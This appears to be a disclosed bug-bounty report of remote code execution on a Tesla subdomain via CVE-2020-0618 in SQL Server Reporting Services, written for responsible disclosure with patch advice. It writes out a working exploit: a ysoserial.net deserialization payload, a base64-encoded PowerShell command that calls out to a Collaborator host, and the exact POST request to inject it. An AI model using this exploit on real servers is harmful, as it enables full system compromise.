RCE on https://beta-partners.tesla.com due to CVE-2020-0618

Disclosed by parzel
  • Program: Tesla
  • Disclosed date: about 2 months ago
  • Reward: $10,000
  • Priority: P1
  • Status: Resolved
Summary by parzel

It was possible for an attacker to gain Remote Code Execution because of a vulnerable SQL Server Reporting Services (CVE-2020-0618)

Report details
  • Submitted
  • Target Location: *.tesla.com
  • Target category: Website
  • VRT: Server-Side Injection > Remote Code Execution (RCE)
  • Priority: P1
  • Bug URL: https://beta-partners.tesla.com/ReportServer/Pages/ReportViewer.aspx
  • Description

    Summary:

    Remote Code Execution on https://beta-partners.tesla.com due to vulnerable SQL Server Reporting Services (CVE-2020-0618).

    Impact:

    The impact is critical as the full system can be compromised with the attack.

    Reproduction:

    1) Download ysoserial.net to a Windows system and unpack it to a folder (https://github.com/pwntester/ysoserial.net/releases/tag/v1.32)
    2) Generate a Burp Collaborator link or host your own web server
    3) Generate your payload with the following snippet on the Windows machine in the folder containing ysoserial.exe (replace the collaborator link with your own link or web server):

    $command = 'Invoke-WebRequest -Uri https://l3pyrfttac5xvt9pe1vzxokv3m9cx1.burpcollaborator.net/POC'
    $bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
    $encodedCommand = [Convert]::ToBase64String($bytes)
    .\ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "powershell.exe -encodedCommand $encodedCommand" -o base64 | clip
    

    [Attachment: Screenshot from 2020-02-15 21-55-50.png]
    4) Insert the payload which was copied to your clipboard in the previous step into the attached POST request and run it against the server
    [Attachment: Screenshot from 2020-02-15 21-56-11.png]
    5) A Tesla machine will try to download something from your collaborator. You can of course modify the payload to run any other PowerShell code, which enables arbitrary code execution
    [Attachment: Screenshot from 2020-02-15 21-56-21.png]

    Mitigation:

    Update SQL Server Reporting Services to the February 2020 patch level to fix the issue.

    Reference:

    https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/

  • HTTP request
    POST /ReportServer/Pages/ReportViewer.aspx HTTP/1.1
    Host: beta-partners.tesla.com
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: de,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: close
    Cookie: BIGipServer~TG-DMZ-PROD-APPS~DMZ-ORIGIN-PROD-SUP-WF1-HTTP=1670455562.20480.0000
    Upgrade-Insecure-Requests: 1
    Pragma: no-cache
    Content-Type: application/x-www-form-urlencoded
    Cache-Control: no-cache
    Content-Length: 3429
    
    NavigationCorrector$PageState=NeedsCorrection&NavigationCorrector$ViewState=[PAYLOAD_HERE]&__VIEWSTATE=